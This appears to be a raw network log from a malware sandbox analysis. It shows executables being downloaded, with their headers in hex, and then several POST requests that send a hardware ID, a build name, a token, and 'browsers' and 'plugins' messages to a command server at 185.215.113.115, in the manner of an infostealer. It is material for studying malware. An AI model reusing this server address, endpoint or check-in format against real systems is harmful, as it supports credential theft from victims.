Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 15 Feb 2025 16:24:13 GMTContent-Type: application/octet-streamContent-Length: 358912Last-Modified: Fri, 14 Feb 2025 19:49:57 GMTConnection: keep-aliveETag: "67af9e65-57a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 85 fa 38 d2 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 7e 3d 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 04 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 3d 00 00 4f 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 98 3c 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 23 00 00 00 20 00 00 00 24 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 61 74 00 00 00 00 00 4a 05 00 00 a0 00 00 00 4a 05 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 15 Feb 2025 16:24:17 GMTContent-Type: application/octet-streamContent-Length: 3277824Last-Modified: Fri, 14 Feb 2025 22:35:41 GMTConnection: keep-aliveETag: "67afc53d-320400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 85 fa 38 d2 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 7e 3d 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 32 00 00 04 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 3d 00 00 4f 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 98 3c 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 23 00 00 00 20 00 00 00 24 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 61 74 00 00 00 00 00 d4 31 00 00 a0 00 00 00 d4 31 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 15 Feb 2025 16:24:24 GMTContent-Type: application/octet-streamContent-Length: 10493517Last-Modified: Fri, 14 Feb 2025 21:42:05 GMTConnection: keep-aliveETag: "67afb8ad-a01e4d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 21 11 53 05 40 7f 00 05 40 7f 00 05 40 7f 00 b1 dc 8e 00 0c 40 7f 00 b1 dc 8c 00 79 40 7f 00 b1 dc 8d 00 1d 40 7f 00 dc 22 7c 01 16 40 7f 00 dc 22 7b 01 16 40 7f 00 dc 22 7a 01 23 40 7f 00 0c 38 fc 00 00 40 7f 00 0c 38 ec 00 14 40 7f 00 05 40 7e 00 50 41 7f 00 a1 23 7a 01 4e 40 7f 00 a1 23 80 00 04 40 7f 00 05 40 e8 00 07 40 7f 00 a1 23 7d 01 04 40 7f 00 52 69 63 68 05 40 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 86 ad 10 5a 00 00 00 00 00 00 00 00 e0 00 02 0d 0b 01 0e 0b 00 9a 04 00 00 74 02 00 00 00 00 00 a6 e2 02 00 00 10 00 00 00 b0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 86 06 00 b4 00 00 00 00 d0 06 00 18 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 07 00 fc 3d 00 00 50 76 06 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 76 06 00 18 00 00 00 30 70 06 00 40 00 00 00 00 00 00 00 00 00 00 00 00 b0 04 00 e0 03 00 00 34 82 06 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 37 99 04 00 00 10 00 00 00 9a 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 60 ed 01 00 00 b0 04 00 00 ee 01 00 00 9e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 17 00 00 00 a0 06 00 00 0a 00 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 69 78 62 75 72 6e 38 00 00 00 00 c0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 18 3a 00 00 00 d0 06 00 00 3c 00 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 3d 00 00 00 10 07 00 00 3e 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 15 Feb 2025 16:24:36 GMTContent-Type: application/octet-streamContent-Length: 30208Last-Modified: Sat, 15 Feb 2025 14:36:06 GMTConnection: keep-aliveETag: "67b0a656-7600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 4d 13 d0 cf 2c 7d 83 cf 2c 7d 83 cf 2c 7d 83 ac 71 7e 82 cd 2c 7d 83 c6 54 ee 83 c4 2c 7d 83 cf 2c 7c 83 e6 2c 7d 83 a1 71 74 82 c1 2c 7d 83 a1 71 7f 82 ce 2c 7d 83 52 69 63 68 cf 2c 7d 83 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e5 d4 8c 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 60 00 00 00 16 00 00 00 00 00 00 82 22 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 00 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 76 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 fc 02 00 00 d0 75 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cd 5e 00 00 00 10 00 00 00 60 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f6 0a 00 00 00 70 00 00 00 0c 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 10 05 00 00 00 80 00 00 00 02 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 fc 02 00 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 15 Feb 2025 16:24:40 GMTContent-Type: application/octet-streamContent-Length: 2086912Last-Modified: Sat, 15 Feb 2025 14:23:59 GMTConnection: keep-aliveETag: "67b0a37f-1fd800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 6c 0c ad 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 8a 04 00 00 b8 00 00 00 00 00 00 00 f0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4b 00 00 04 00 00 39 66 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 c0 05 00 6b 00 00 00 00 b0 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 a0 05 00 00 10 00 00 00 a0 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 b0 05 00 00 04 00 00 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 c0 05 00 00 02 00 00 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 d0 05 00 00 02 00 00 00 b6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 66 77 74 73 69 6d 65 00 00 1a 00 00 e0 30 00 00 fa 19 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 72 6e 6d 79 6d 6f 68 00 10 00 00 00 e0 4a 00 00 04 00 00 00 b2 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4a 00 00 22 00 00 00 b6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 15 Feb 2025 16:24:46 GMTContent-Type: application/octet-streamContent-Length: 1815552Last-Modified: Sat, 15 Feb 2025 14:03:58 GMTConnection: keep-aliveETag: "67b09ece-1bb400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d3 a3 1d 93 97 c2 73 c0 97 c2 73 c0 97 c2 73 c0 19 dd 60 c0 cd c2 73 c0 6b e2 61 c0 96 c2 73 c0 52 69 63 68 97 c2 73 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 71 b8 bc 5b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 05 0c 00 22 00 00 00 14 00 00 00 00 00 00 00 d0 46 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 47 00 00 04 00 00 98 5b 1c 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 70 00 00 6a 00 00 00 00 60 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 00 00 00 10 00 00 00 50 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 60 00 00 00 02 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 00 00 00 02 00 00 00 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 64 68 65 6c 78 6b 72 00 30 1b 00 00 90 2b 00 00 28 1b 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 77 68 6b 64 63 61 61 00 10 00 00 00 c0 46 00 00 04 00 00 00 8e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 46 00 00 22 00 00 00 92 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 31 44 43 44 44 30 44 32 39 46 33 37 36 31 34 34 31 38 34 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 72 65 6e 6f 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="hwid"321DCDD0D29F3761441847------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="build"reno------HCFCAAEBGCAKKFIDBKJJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIHost: 185.215.113.115Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 39 61 35 35 62 62 32 32 61 66 64 64 32 38 66 33 38 36 62 32 31 32 38 39 35 38 62 30 35 39 31 33 62 61 33 66 64 38 31 39 62 38 37 37 30 37 32 65 32 33 37 61 65 62 62 32 62 66 63 38 61 64 65 36 33 66 36 33 65 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 2d 2d 0d 0a Data Ascii: ------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="token"619a55bb22afdd28f386b2128958b05913ba3fd819b877072e237aebb2bfc8ade63f63eb------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="message"browsers------HIDAFHDHCBGDGCBGCGII--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBKHost: 185.215.113.115Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 39 61 35 35 62 62 32 32 61 66 64 64 32 38 66 33 38 36 62 32 31 32 38 39 35 38 62 30 35 39 31 33 62 61 33 66 64 38 31 39 62 38 37 37 30 37 32 65 32 33 37 61 65 62 62 32 62 66 63 38 61 64 65 36 33 66 36 33 65 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="token"619a55bb22afdd28f386b2128958b05913ba3fd819b877072e237aebb2bfc8ade63f63eb------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; 